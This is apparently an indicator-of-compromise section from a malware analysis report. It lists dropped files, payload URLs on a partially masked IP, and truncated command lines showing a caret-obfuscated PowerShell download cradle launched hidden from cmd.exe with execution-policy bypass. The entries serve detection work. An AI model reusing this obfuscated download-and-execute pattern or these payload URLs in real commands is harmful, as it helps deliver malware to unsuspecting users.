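Technical Information
Note: the entries below are observed indicators: file paths under %LOCALAPPDATA%, HTTP URLs (the IP address is partially masked with '#' as published), and process command lines. The PowerShell command lines are truncated ('....'), so the remainder of each command is not shown here. The visible portion still carries stable detection features: the caret-escaped, mixed-case `Po^wEr^sh^elL.e^Xe` launched from `cmd.exe /c`, the switches `-executionpolicy bypass -noprofile -w hidden`, the `Net.WebClient` type name split across `$v1`/`$v2`, and a hard-coded `User-Agent` of 'Google Chrome'. When matching on command-line telemetry, compare case-insensitively and with `^` characters stripped, since cmd.exe removes the carets before the child process starts.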
- '%LOCALAPPDATA%\tempzwi51.exe'
- %LOCALAPPDATA%\tempzwi51.exe
- %LOCALAPPDATA%\~$mpvrp72.docx
- http://19#.#19.80.64/iveivbrtTWXc/jucsheck.exe
- http://19#.#19.80.64/iveivbrtTWXc/invoice_3652.docx
- '<SYSTEM32>\cmd.exe' /c hLKUWcOeganouCM & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c aloTCOIngLFwzki & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c hLKUWcOeganouCM & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '<SYSTEM32>\cmd.exe' /c aloTCOIngLFwzki & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%LOCALAPPDATA%\TempVrP72.docx"